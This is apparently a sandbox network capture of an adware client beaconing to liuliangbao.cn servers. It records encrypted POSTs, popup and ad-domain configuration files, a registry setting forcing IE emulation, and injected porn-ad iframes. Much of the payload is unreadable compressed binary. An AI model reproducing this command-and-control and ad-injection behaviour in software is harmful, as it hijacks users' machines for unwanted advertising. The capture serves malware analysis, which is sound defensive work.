User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; chromeframe/22.0.1229.94; .NET CLR 2.0.50727)

Host: ads2.contentabc.com

Connection: Keep-Alive

Cookie: adtools_fc=siteAllocID_266580_expires_1484906106|


HTTP/1.1 200 OK

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Date: Fri, 20 Jan 2017 04:55:06 GMT

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: GET,POST

Access-Control-Allow-Headers: Content-Type

Access-Control-Max-Age: 86400

Cache-Control: private, no-cache, no-cache, proxy-revalidate

Set-Cookie: adtools_fc=siteAllocID_266580_expires_1484906106|; expires=Sun Feb 19 04:55:06 201

Server: Logger/0.1

Content-Encoding: gzip
311.............T.n.8.....q.@mI...leQ4i.As)./.D."-1.H.."._.C..>.e..
.@.......7. 7.........)....QT5.v..A...Up...I..lD..%/.=.....b.JKm..{4=k
.R[.UDkd(cB.........$..2x....Z9*.......:.. ...B...]6.."..[8K..Q=..8..w
 #...RF. ...RL......'Y....og..jW.*g......X....3iJ..".p.?.;....Z8*...k.
.J...T....j.y...A......U._.....|.k...?........q.?.......|..Awz..Q..~w.
.L.,z.m... ..oO...._.Z......|.}|"7O...........I.. ...m.-1r...2..'...j.
Q.$>~.x..Tp.~.0i..G....q.".,...'m.........}=q..{.|.....5^eI...4...p
...Dk..xE.t.^Ey..i.d.%...4.Q./........:^........\S.$..i.......g...N8.U
.,.....FUo;O[..r...~.. .P.F0...e....A........p.;.......9p.....0.F.5.lU
..b......S@'p.#..<.B....... l....7RS.E.zQ.C......#.:C- .....m...0a.
......B8!...f.@D{H.....@):.....4!,.M...Z..O).7...T...N...e............
......:..................'.....0..

GET /clt/config/cfg_6.5.ini?t=1480915691&checksum=&cid=58C013CF767C4DCAA7E8D33815C20EF6 HTTP/1.1

Cache-Control: no-cache

User-Agent: RemoteUpdater : 6.5.73.5

Host: cltres.liuliangbao.cn

Connection: Close


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:55:09 GMT

Content-Type: application/octet-stream

Content-Length: 5186

Last-Modified: Mon, 05 Dec 2016 05:28:11 GMT

Connection: close

ETag: "5844faeb-1442"

Accept-Ranges: bytes
..[.E.x.e.c.u.t.e.r.C.o.n.f.i.g.].....1.0.9.=.1.....1.1.0.=.1.....1.2.
5.=.1.....1.4.0.=.1.....1.4.1.=.1.....1.5.=.1.2.....1.5.6.=.1.....1.5.
7.=.1.....1.6.=.1.6.....1.7.1.=.1.....1.7.2.=.1.....1.8.7.=.1.....1.8.
8.=.1.....2.0.4.=.1.....2.1.8.=.1.....2.1.9.=.1.....2.3.4.=.1.....2.3.
5.=.1.....2.9.7.=.1.....3.1.=.8.....3.2.=.3.....3.2.8.=.1.....3.6.0.=.
1.....3.7.5.=.1.....3.9.1.=.1.....4.6.=.1.....4.7.=.3.....6.2.=.1.....
6.3.=.1.....7.8.=.3.....7.9.=.1.....9.3.=.1.....9.4.=.1.....P.o.p.u.p.
T.T.L.T.y.p.e.=.1.5.,.1.6.,.3.1.,.3.2.,.4.6.,.4.7.,.6.2.,.6.3.,.7.8.,.
7.9.,.9.3.,.9.4.,.1.0.9.,.1.1.0.,.1.2.5.,.1.4.0.,.1.4.1.,.1.5.6.,.1.5.
7.,.1.7.1.,.1.7.2.,.1.8.7.,.1.8.8.,.2.0.4.,.2.1.8.,.2.1.9.,.2.3.4.,.2.
3.5.,.2.9.7.,.3.2.8.,.3.6.0.,.3.7.5.,.3.9.1.....P.o.p.u.p.W.i.n.d.o.w.
R.a.t.e.=.3.0.....R.a.n.d.o.m.T.a.r.g.e.t.=.1.....[.S.y.s.t.e.m. .C.o.
n.f.i.g.u.r.a.t.i.o.n.].....I.d.l.e.T.i.m.e.=.1.I.F.I.9.F.7.5.e.8.c.c.
9.b.f.6.e.9.7.1.d.f.2.7.2.c.0.7.b.e.5.7.d.1.6.3.5.1.d.4.1.d.8.c.d.9.8.
f.0.0.b.2.0.4.e.9.8.0.0.9.9.8.e.c.f.8.4.2.7.e.2.9.e.7.2.9.4.9.d.6.b.e.
a.2.5.c.6.a.b.6.0.f.e.3.7.4.....R.E.G._.F.E.A.T.U.R.E._.B.R.O.W.S.E.R.
_.E.M.U.L.A.T.I.O.N.=.H.K.E.Y._.C.U.R.R.E.N.T._.U.S.E.R.|.S.o.f.t.w.a.
r.e.\.M.i.c.r.o.s.o.f.t.\.I.n.t.e.r.n.e.t. .E.x.p.l.o.r.e.r.\.M.a.i.n.
\.F.e.a.t.u.r.e.C.o.n.t.r.o.l.\.F.E.A.T.U.R.E._.B.R.O.W.S.E.R._.E.M.U.
L.A.T.I.O.N.|.$.E.x.c.N.a.m.e.|.1.|.1.1.0.0.1.....[.U.s.e.r. .C.o.n.f.
i.g.u.r.a.t.i.o.n.].....A.g.e.n.t.U.p.d.a.t.e.=.3.6.0.0.0.....A.u.t.o.
P.r.o.t.o.c.o.l.H.e.a.d.=.0.....C.l.e.a.r.E.l.a.p.s.e.=.3.0.....C.<<< skipped >>>

POST /as/c/f8/ HTTP/1.1

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

User-Agent: llb/1.1.73.813

Host: ap5.liuliangbao.cn

Content-Length: 1206

Connection: Keep-Alive

Cache-Control: no-cache

d=9c6a6369b0e924e65c507e6e9cd625fdc22e1850b08d7cea4ad3e92a4508f9e491bee079a09fb06e684a5f907c652f39636ad4a8eb15bb141b98964a600a62fd173762b57057855be9b3bb479568d8abf41ded5a7945c45042bafecd291f869161bd2ec6904dc7872b91013fc2b1d55dc8689cb12d332745c158d074f0ebd37dd5d0c13c13299aa98ce04ccd0a4e75df0de2511158a8ee799d2fff5029b661e671fa3abd6ca9203c9fc0a3913870e7dfc8eed13a3f3bc5df0465eed8856239bd175442665498ded8690bc5aad55d2b87578ce6ed754a3f360730b03b69396ead1118f214d1021de3567a3d0a86e5291b6c9c0d7bd8059a819a1a5350bf1ec9b8712aaf4c3ec029277b71cb9674bbb712e2706c860200685c6fc013a159813c06280afd6883f43d69aefdcc7bd743b641df0dfd6a3d73063586c6e6cf80a5646037f0fcdbaeb957aa417827ee68dc08d16227821b29cb183c3cdc7bee8c59d3b02ae50e2592aa4e23c081ad9da5c2da9e7c0adf01eeda90447cfbe09880f870c249c6cf3ff34a44085b24b2f7ce7fdcf5822233b85367e4cc56e110999c7918cbcd0543aeb382a6708df6bea82b74ea27fc5b8e8476c11a095fc9ef3cd0ea09583868afeb4ef937698b8d305f8c2fcf3bc667681bec46b4822104803f145f4eb8f06299fd8ce5cd726451cf8b5f157f69443b448e3cfeeec82537b99d927e607d49669dffb41eee3c5877702a07d2301129a83e5d3bb0707df35109963a83173c66c544bd2be04b2fd87b888c9ee449eae270032eead97b2d5d728485240d3281ba3db7e4df33698e1fbf0556891721793f8e6d0accc77a34cc2f
HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:54:42 GMT

Content-Type: text/html;charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Content-Encoding: gzip
52.................!...J.......G........E...........N.5R..,..Y._.~\.x;
. .NW,.....%P.....0......


GET /redirect/CFGUpdate?number=6.5&checksum=&cid=58C013CF767C4DCAA7E8D33815C20EF6&rd=25924 HTTP/1.1

Accept-Encoding: gzip, deflate

User-Agent: llb/1.1.73.813

Host: ap5.liuliangbao.cn

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Jan 2017 09:54:42 GMT

Content-Length: 0

Connection: keep-alive

Location: hXXp://cltres3.liuliangbao.cn/clt/config/6.5.xml?checksum=&cid=58C013CF767C4DCAA7E8D33815C20EF6&rd=25924

....

POST /as/c/f8/ HTTP/1.1

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

User-Agent: llb/1.1.73.813

Host: ap5.liuliangbao.cn

Content-Length: 156

Connection: Keep-Alive

Cache-Control: no-cache

d=c1b8f7ee3bb5f335a0828bf6d75de6b6603affb1f5f4d8e08f09be352e7da44ede55d5438928a8c3fa10dc85944854301232f4c2a43b4880239815bb8013a439451d9079a29ca0092fa8f5636a
HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:54:43 GMT

Content-Type: text/html;charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Content-Encoding: gzip

52.................0..0K.....2....K...g..>..ODw4..<g.aE1......&l
t;.z.C.M....E.....A.yP.....0......

GET /clt/jobid/4acb0cb2593b811134e592df6755ee63603affb1f5f4d8e08f09be352e7da44e172e1384869d76dbf5b725b73695cee9ba28a198bdf5d219f25b7f7d1ea108d4d2513de6c36d2bd1ec2e63b933a620b3493b945ab6763eaba1302ee18996f0 HTTP/1.1

Accept-Encoding: gzip, deflate

User-Agent: llb/1.1.73.813

Host: ap5.liuliangbao.cn

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:54:43 GMT

Content-Type: text/html;charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Content-Encoding: gzip
62.................0..0KO.P..n2...KX"....=..r...q/.^.F.H.M.].S8..1....
..V|..:_TZ9.~..h..N.[.%?._..p.....0......


GET /redirect/CFGUpdate?number=6.5&checksum=&cid=92717DB0E74242C08559DD2797903A6B&rd=23501 HTTP/1.1

Accept-Encoding: gzip, deflate

User-Agent: llb/1.1.73.813

Host: ap5.liuliangbao.cn

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Jan 2017 09:54:43 GMT

Content-Length: 0

Connection: keep-alive

Location: hXXp://cltres3.liuliangbao.cn/clt/config/6.5.xml?checksum=&cid=92717DB0E74242C08559DD2797903A6B&rd=23501

....

POST /as/2/h1/ HTTP/1.1

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

User-Agent: llb/1.1.73.813

Host: ap5.liuliangbao.cn

Content-Length: 202

Connection: Keep-Alive

Cache-Control: no-cache

d=1da6bb2e5f7e7515c587d0dbede1037e6e649b5c0764d89ce50328974222f8817439135a9ba60ac11fca74dd6ec0b92ad5ba0be3705f41cde5c5b3b9909bf746c101ba545e7b5adcf820662538d56dcaad5c4e1a353f119267fbc15a747a059e802c9c22
HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:54:44 GMT

Content-Type: text/html;charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Content-Encoding: gzip

88.................0......a...20......h.}.x.x.......-.. .V?.!*A......W
f...0R..c.sF.d4wz{...m....h)..V.......n$..yR(.-...S...&I..K.Z?}..@....
..0......

POST /ts/f2.2/ HTTP/1.1

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

User-Agent: llb/1.1.73.813

Host: ap5.liuliangbao.cn

Content-Length: 204

Connection: Keep-Alive

Cache-Control: no-cache

d=c18ee3303eb64b5585ea560b8c402be1de6b5c6d5ed3419429ebb5b51b0f3e5b4b0d6cad6165f9dd534a9cdd7be8ecb6f0151cff051ae64404b936058d136f75861edfc389e86b859df1d16df0e04fbcc0e41ce37fc23809f3ddacce1e82642bba922c967c
HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:54:45 GMT

Content-Type: application/octet-stream

Transfer-Encoding: chunked

Connection: keep-alive

Content-Encoding: gzip
2700..............St&[..c.c.N:v:.....m...v...;.$...y......{..w.QU.f.5.
.....$..x.-l.Z.^..`.v.ovI'.b.'d.F.kG.P*......]........R..A>......i.
`. ..7(.L...2}Hh..e.6.uhm.o$c.z!!.V.i...~.C.......a......i"e.T[.Y.b...
....Z..%.pg..'|.....llId5.m...V.J..:rv...!.....q.........a.....b.zt...
..........0e^QK.u.*.`5..t..... hC..B.^.....!..../@o..b(.n.......v..a.#
u.z=@ ...nN..1..=.H.B.O.*..4n,.n..|...........P-jOo..........p*,.Ot.#y
.%dTN..J8..q..1hp....A.9.....ss../sYr.[z...M.l........(l:.....2\>..
0....,...../k*.<....o..X."..m.....B.....x.......p...L.My.bF.=......
5...6.Z..i.!N..:...9.......Q.m....B^....... G....8...<....... "g...
....;..J...o,x....zJ.9.....s........7.#P0...."...LlxM{1P..pEP.]....$..
..z.._6.........O{.Cb...0F ....(.z*......,...~%..r..MW...[5#.<b.',.
.I..Z.|..vl=...n..mT*a...bI.....t|.SK::.A)..T..23;.7.....q.":.c..u..A.
.x@....I.t...#.W.3\.\.Zd....[}..\...g}.nZ-.yA..W$....$D.,.\...?..-W).l
......(.T..q.:d...).:.........b.}.=%..-.....5.Pul..'.n.wV.../I........
.,^?y"u....Zn....X?5.......yehh...;..b....-j.E........Lf[QYc.. .MC.#od
j...{0X.r........;......`jM..n..m.^..t".8....k...h.=c.}...,]..WUK2....
ZHB..v.@..."!O......7.".v>e.>.Q.....OMoI.k...6..F...Z......-..f.
..P<..A........bq...K.U.<.4&.6].......>T8.|..a...Z].Lyn*.....
Z.......o.:3.,NZt.D..W..*..8j.U_.t..j...i.$.....-./...>.jc4~M.Z...P
.(rQ.x.......f...W.4...qWhs`..[y...3....n2..j.t.......^........y.S\.Q#
k......b.......`8.f.i .....,.d....fz9.W.t.#*U=..=ho.....$z..;u'F..e..5
....x...h..|..z.J].Bi9h..c........^.46.......4...)!...mX..0...TA..<<< skipped >>>

GET /irt?_iwt_id=null&_iwt_UA=UA-iqiyi-100009&jsonp=SetIDA0&_iwt_p1=A-0-0&_iwt_p2=572044000&_iwt_p3=56-0-0-0&_iwt_p4=787ab6983c8a883fa3c5190ce3cac804&_iwt_p5=&_iwt_muid=5088e17771f6d54476f95dc61f9e80b4&r=5889 HTTP/1.1

Accept: */*

Accept-Language: en-US

Referer: hXXp://VVV.iqiyi.com/common/flashplayer/20170119/1050f98c2359.swf

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: irs01.com

Connection: Keep-Alive

Cookie: _iwt_id=qrIman_egVifaJSxR1USTgA


HTTP/1.1 200 OK

Date: Fri, 20 Jan 2017 09:55:16 GMT

Content-Type: text/javascript

Content-Length: 34

Connection: close

Set-Cookie: _iwt_id=qrIman_egVifaJSxR1USTgA; expires=Sun, 20-Jan-19 09:55:16 GMT; domain=.irs01.com; path=/

P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID"

Cache-Control: private,no-store,no-cache,must-revalidate,proxy-revalidate,no-transform,max-age=0

Pragma: no-cache

Expires: 0
SetIDA0('qrIman_egVifaJSxR1USTgA')..

GET /ads?zone_id=1343931&ref=pornvideo-box.com&pid=1c7fd951-6162-4776-b70b-13bb84f94bba&ts=1484906106 HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; chromeframe/22.0.1229.94; .NET CLR 2.0.50727)

Host: ads.trafficjunky.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Fri, 20 Jan 2017 09:55:06 GMT

Content-Type: text/html

Content-Length: 1691

Connection: close

Cache-Control: private, no-cache, no-cache, proxy-revalidate

Server: Logger/0.1

Set-Cookie: tj_UUID=b3da0bc7-5356-4cf4-8cd7-941025e2cf15; domain=.trafficjunky.net; path=/; Expires=Mon Jan 15 04:55:06 2018

Access-Control-Allow-Origin: *

Access-Control-Allow-Credentials: true

Access-Control-Allow-Methods: GET,POST

Access-Control-Allow-Headers: Content-Type

Access-Control-Max-Age: 86400
<HTML><HEAD><script type="text/javascript"> var MAXI
MUM_DEPTH = 10;function mouseover(self){for(var i = 0; i < MAXIMUM_
DEPTH; i  ){var parent = getParent(window.parent, i);parent.postMessag
e({event: "mouseover", click_url:self.attributes.click_url.value}, "*"
);}}function mouseout(self){for(var i = 0; i < MAXIMUM_DEPTH; i  ){
var parent = getParent(window.parent, i);parent.postMessage({event:"mo
useout"}, "*");}}function getParent(e, i){if( i == 0){return e;}return
 getParent(e.parent, i - 1);}</script><TITLE>Ad delivery s
ystem</TITLE><meta name="keywords" content="1000232241" def="
1" z_id="1343931" ad_id="1189078351" qw="0" isave="yes" /> <meta
 name="description" content="" /> <style type="text/css"><
!-- a img   { border: 0; } body    { margin: 0; padding: 0; text-align
: center;} --> </style> </HEAD><BODY style="backgrou
nd-color:transparent;"><iframe onmouseover="mouseover(this);" on
mouseout="mouseout(this)" id="1343931_1484906106" name="1343931_148490
6106" src="hXXp://ads2.contentabc.com/ads?spot_id=2007013&rand=1853651
284&impid=55_1484906106204537_27019&uuid=b3da0bc7-5356-4cf4-8cd7-94102
5e2cf15" width="300" height="250" scrolling="no" frameborder="0" allow
transparency="true" marginwidth="0" marginheight="0" z_id="1343931" c_
id="1000232241"  ad_id="1189078351" def="1" qw="0" click_url="hXXp://a
ds.trafficjunky.net/click?url=iframe-click&click_data=QAAAAOQlAAB6
3oFYAAAAAAAAAAC7gRQAu4EUAAAAAAAxVZ47T-XfRs1OijwAAAAAAAAAAAABAAAAAA<<< skipped >>>

GET /clt/config/GlobalConfig_6.5.ini?t=1480915691&checksum=&cid=58C013CF767C4DCAA7E8D33815C20EF6 HTTP/1.1

Cache-Control: no-cache

User-Agent: RemoteUpdater : 6.5.73.5

Host: cltres.liuliangbao.cn

Connection: Close


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:55:08 GMT

Content-Type: application/octet-stream

Content-Length: 2804

Last-Modified: Mon, 05 Dec 2016 05:28:11 GMT

Connection: close

ETag: "5844faeb-af4"

Accept-Ranges: bytes

..[.9.5.0.9.5.].....C.h.e.c.k.F.r.o.m.F.i.r.s.t.=.0.....D.e.s.c.r.i.p.
t.i.o.n.=.)Y s;So.....F.i.l.t.e.r.=.9.5.0.9.5...c.o.m.....F.r.o.m.T.y.
p.e.=.1.3.....T.o.=.d.e.t.a.i.l...y.a.o...9.5.0.9.5...c.o.m.....[.A.l.
e.x.a.S.e.t.t.i.n.g.].....A.I.D.L.i.f.e.T.i.m.e.=.3.....A.I.D.U.p.d.a.
t.e.D.a.y.=.2.0.1.2.0.2.1.7.....A.I.D.U.p.d.a.t.e.R.a.t.e.=.0.....C.h.
a.n.g.e.A.I.D.W.h.e.n.I.p.U.p.d.a.t.e.=.0.....[.D.o.m.a.i.n.F.i.l.t.e.
r.].....D.o.m.a.i.n.F.i.l.t.e.r.L.i.s.t.=.a.l.i.t.r.i.p.,.m.o.g.u.j.i.
e.,.m.e.i.l.i.s.h.u.o.,.9.5.0.9.5.....[.D.o.m.a.i.n.L.i.s.t.].....c.o.
u.n.t.r.y.=.a.c. .a.d. .a.e. .a.f. .a.g. .a.i. .a.l. .a.m. .a.n. .a.o.
 .a.q. .a.r. .a.s. .a.t. .a.u. .a.w. .a.z. .b.a. .b.b. .b.d. .b.e. .b.
f. .b.g. .b.h. .b.i. .b.j. .b.l. .b.m. .b.n. .b.o. .b.r. .b.s. .b.t. .
b.v. .b.w. .b.y. .b.z. .c.a. .c.c. .c.d. .c.f. .c.g. .c.h. .c.i. .c.k.
 .c.l. .c.m. .c.n. .c.o. .c.r. .c.s. .c.u. .c.v. .c.x. .c.y. .c.z. .d.
e. .d.j. .d.k. .d.m. .d.o. .d.z. .e.c. .e.e. .e.g. .e.r. .e.s. .e.t. .
e.u. .f.i. .f.j. .f.k. .f.m. .f.o. .f.r. .g.a. .g.b. .g.d. .g.e. .g.f.
 .g.g. .g.h. .g.i. .g.l. .g.m. .g.n. .g.p. .g.q. .g.r. .g.s. .g.t. .g.
u. .g.w. .g.y. .h.k. .h.m. .h.n. .h.r. .h.t. .h.u. .i.d. .i.e. .i.l. .
i.m. .i.n. .i.o. .i.q. .i.r. .i.s. .i.t. .j.e. .j.m. .j.o. .j.p. .k.e.
 .k.g. .k.h. .k.i. .k.m. .k.n. .k.p. .k.r. .k.t. .k.w. .k.y. .k.z. .l.
a. .l.b. .l.c. .l.i. .l.k. .l.r. .l.s. .l.t. .l.u. .l.v. .l.y. .m.a. .
m.c. .m.d. .m.e. .m.g. .m.h. .m.k. .m.l. .m.m. .m.n. .m.o. .m.p. .m.q.
 .m.r. .m.s. .m.t. .m.u. .m.v. .m.w. .m.x. .m.y. .m.z. .n.a. .n.c.

<<< skipped >>>

GET /ads?zone_id=1343951&ref=pornvideo-box.com&pid=1c7fd951-6162-4776-b70b-13bb84f94bba&ts=1484906106 HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; chromeframe/22.0.1229.94; .NET CLR 2.0.50727)

Host: ads.trafficjunky.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Fri, 20 Jan 2017 09:55:06 GMT

Content-Type: text/html

Content-Length: 1689

Connection: close

Cache-Control: private, no-cache, no-cache, proxy-revalidate

Server: Logger/0.1

Set-Cookie: tj_UUID=f262600c-ccdc-4fa0-a68a-ebaa6afeceec; domain=.trafficjunky.net; path=/; Expires=Mon Jan 15 04:55:06 2018

Access-Control-Allow-Origin: *

Access-Control-Allow-Credentials: true

Access-Control-Allow-Methods: GET,POST

Access-Control-Allow-Headers: Content-Type

Access-Control-Max-Age: 86400
<HTML><HEAD><script type="text/javascript"> var MAXI
MUM_DEPTH = 10;function mouseover(self){for(var i = 0; i < MAXIMUM_
DEPTH; i  ){var parent = getParent(window.parent, i);parent.postMessag
e({event: "mouseover", click_url:self.attributes.click_url.value}, "*"
);}}function mouseout(self){for(var i = 0; i < MAXIMUM_DEPTH; i  ){
var parent = getParent(window.parent, i);parent.postMessage({event:"mo
useout"}, "*");}}function getParent(e, i){if( i == 0){return e;}return
 getParent(e.parent, i - 1);}</script><TITLE>Ad delivery s
ystem</TITLE><meta name="keywords" content="1000232241" def="
1" z_id="1343951" ad_id="1189078351" qw="0" isave="yes" /> <meta
 name="description" content="" /> <style type="text/css"><
!-- a img   { border: 0; } body    { margin: 0; padding: 0; text-align
: center;} --> </style> </HEAD><BODY style="backgrou
nd-color:transparent;"><iframe onmouseover="mouseover(this);" on
mouseout="mouseout(this)" id="1343951_1484906106" name="1343951_148490
6106" src="hXXp://ads2.contentabc.com/ads?spot_id=2007013&rand=1853651
284&impid=27_1484906106350967_9603&uuid=f262600c-ccdc-4fa0-a68a-ebaa6a
feceec" width="300" height="250" scrolling="no" frameborder="0" allowt
ransparency="true" marginwidth="0" marginheight="0" z_id="1343951" c_i
d="1000232241"  ad_id="1189078351" def="1" qw="0" click_url="hXXp://ad
s.trafficjunky.net/click?url=iframe-click&click_data=QAAAAOQlAAB63
oFYAAAAAAAAAADPgRQAz4EUAAAAAAAxVZ47T-XfRs1OijwAAAAAAAAAAAABAAAAAAA<<< skipped >>>

GET /vodpb.gif?type=piaoshhtestmayttf&des=h5p2ptest&brs=mozilla%2F4.0%20(compatible%3B%20msie%207.0%3B%20windows%20nt%205.1%3B%20trident%2F4.0%3B%20sv1%3B%20gtb7.3%3B%20u9dnfsh)%20qqbrowser%2F6.14.15493.201&mse=0&p2p=0&p=pc&_=1484906109847 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: msg.video.qiyi.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.8.0

Date: Fri, 20 Jan 2017 09:55:11 GMT

Content-Type: image/gif

Content-Length: 0

Connection: keep-alive

HTTP/1.1 200 OK..Server: nginx/1.8.0..Date: Fri, 20 Jan 2017 09:55:11 
GMT..Content-Type: image/gif..Content-Length: 0..Connection: keep-aliv
e..

GET /exsites?spread_type=2&ad_ids=198:5&location_info=0&callback=getjjsku_callback HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: x.jd.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: openresty

Date: Fri, 20 Jan 2017 09:55:09 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: close

Vary: Accept-Encoding

Set-Cookie: aduuid=a1e082c9-3546-45b5-a9dc-dd376edeca71; expires=Fri, 20-Jan-17 10:55:08 GMT; path=/; domain=.x.jd.com

Expires: Fri, 20 Jan 2017 09:55:08 GMT

Cache-Control: no-cache

Content-Encoding: gzip
4827.................../....=z'.d"../...H...b!.. .... ......<9'N..K
b.....c.q..q.;q&^...yb..S../H..VK..f.3.<I-...[.U.........sC...n....
..;..m...px. ..ac.8P[..?........n.F....6.s....W..= ..(.........mwr.d..
.cf......]_....K7S.(..7.U.4...:....X.V.........st.fV...".....o..e.:;..
.x`8Z.Z..<..........|.....0.. @.....{.....iV.....#.8o...v........w.
..z...;.y7..w.8......?........-.....@.7..^.5.t.....[.....%..G..E]3..
$.C.8).m.................F.......(1...v.g.L&....j ..-......}O...l-p...
9.5.(...`.9.{n[."wu*.I...'.z.......nit... O^...s..jn..J\......wg..... 
.sE'....G.>yj\..}3.2.D.......vd...Q..nh.x.n.@..e.Bb.U..u._.(..@7j..
>.ah%...7.[vv.$.......]...k.OF...0.|.<....a0t..>nC{.)G..N....
...O.....<..fQ\I..%.b.....V...4..6b...V...m.b.......Oj.i.k.......&.
&.[..=.XEo....D...................._.2]=..]...x...j..g..S.......o.h..V
........Hv].0xF......lo.........B.o........Q.Y5.O....O........tSWw}7 n
....O..~..Oky.yl%il.........6....g.n7c..]>P.nhZ...E-t..=.*.........
...n...|.......c..A...P.'......6...~.l.U..d.%fz;v.<I*...c...n.....j
.E..q......O1f;...U...._.(.......[U.o.7w .M\.z`UY}@..y~.w.W..Y@.W.\...
-.x[K.G...].b.p..[.....C;..liW..e.j._.e....F..v.8J2-........z..n.ko.nF
.OL.g.T.*....I.......q.C....b%..p]......USW..Kde.N./.C~6.....z.".ZA..p
....<.nE........m..7&..wl....o......0.<...........z..!_........d
..,.#........[..c..~...f6v*... *..X.....U.[^y....W...[/Vf=...#wG......
)..'.7......ApP.....#..M.......q..B.C..H.D .<.@.:D...t.=.p..HS.Q..1
......7...V..@b..........;k-t......mxq....R.q.Z........#.2w.'...r.<<< skipped >>>

GET /crossdomain.xml HTTP/1.1

Accept: */*

Accept-Language: en-US

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: meta.video.qiyi.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Last-Modified: Mon, 05 Jul 2010 06:25:20 GMT

ETag: "4c317ad0-e3"

Server: QWS

Content-Type: text/xml

Content-Length: 227

Accept-Ranges: bytes

Cache-Control: max-age=229

Expires: Fri, 20 Jan 2017 09:59:03 GMT

Date: Fri, 20 Jan 2017 09:55:14 GMT

Connection: keep-alive
<?xml version="1.0"?>....<cross-domain-policy> <site-co
ntrol permitted-cross-domain-policies="all" />..    <allow-acces
s-from domain="*" /> ..    <allow-http-request-headers-from doma
in="*" headers="*"/>..</cross-domain-policy>HTTP/1.1 200 OK..
Last-Modified: Mon, 05 Jul 2010 06:25:20 GMT..ETag: "4c317ad0-e3"..Ser
ver: QWS..Content-Type: text/xml..Content-Length: 227..Accept-Ranges: 
bytes..Cache-Control: max-age=229..Expires: Fri, 20 Jan 2017 09:59:03 
GMT..Date: Fri, 20 Jan 2017 09:55:14 GMT..Connection: keep-alive..<
?xml version="1.0"?>....<cross-domain-policy> <site-contro
l permitted-cross-domain-policies="all" />..    <allow-access-fr
om domain="*" /> ..    <allow-http-request-headers-from domain="
*" headers="*"/>..</cross-domain-policy>....


GET /20161122/3a/3c/0ad38a6488686acc96d4ec67497a33b9.xml?tn=0.09199875919148326 HTTP/1.1

Accept: */*

Accept-Language: en-US

Referer: hXXp://VVV.iqiyi.com/common/flashplayer/20170119/1050f98c2359.swf

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: meta.video.qiyi.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: QWS

Content-Type: text/xml

Content-Length: 2789

Last-Modified: Tue, 22 Nov 2016 01:42:29 GMT

ETag: "5833a285-ae5"

Accept-Ranges: bytes

Cache-Control: max-age=294

Expires: Fri, 20 Jan 2017 10:00:10 GMT

Date: Fri, 20 Jan 2017 09:55:16 GMT

Connection: keep-alive
<?xml version="1.0" ?>.<fileset>. <flv name="9488281efa
6a6ed5aaa87a36ec2a4078.flv">.  <height>504</height>.  &
lt;width>896</width>.  <timestampcontinuous>1</times
tampcontinuous>.  <filesize>4418663</filesize>.  <du
ration>56.703</duration>.  <video_tag>09000032000000000
